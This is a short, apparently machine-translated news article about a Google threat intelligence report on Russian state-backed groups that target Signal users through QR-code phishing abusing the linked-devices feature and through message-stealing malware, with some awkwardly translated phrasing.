- Google researchers warn about a ongoing phishing campaign
- Distribute QR codes that attackers access to people's signal accounts
- The objectives are mostly military personnel, experts warn
The threat actors sponsored by the Russian State have increasingly addressed signal messenger users, with phishing attacks with QR code, malware and more, experts have warned
A report from the GOOGLE threat intelligence group (GTIG) indicates the use of Signal among military personnel, politicians, journalists, activists and other high -risk groups have recently become generalized, which triggers the growing interest of the Threat of the actors of the threats of the Russian State, particularly since the beginning of the beginning of the beginning of the Russian-Ukraine war.
As a result, actors of different threats (especially APT44 and UNC5792) have been trying to abuse the characteristic of “linked devices” in the attack. Linked devices allow users to connect multiple devices, such as laptops, tablets and mobile devices, to the same account. To simplify the login process, users can scan a QR code from a device that has already logged in, instead of writing a password or registering a new service.
QR codes
That said, cybercriminals have begun to send electronic phishing emails with invitations to false groups, different security alerts and the like, which also carry a QR code. If the victim scan it, the attacker's device is recorded in his account, obtaining access to contacts, messages and more.
Since Phishing's email does not carry a malicious link or an attached file, which can be scanned by email safety solutions, these emails often make it past filters and people's entry trays .
Beyond phishing, groups of Russian and bellruse threats are also using specialized malware and tools to exfilt signal messages directly from Android and Windows Committed devices.
These efforts include scripts such as Wavesign, which periodically extracts messages from the signal database, and infamous chisel, a variant of known Android malware. Other actors, such as Turla and UNC1151, have taken advantage of Powershell's profits and the command line to steal stored signal messages from compromised computers.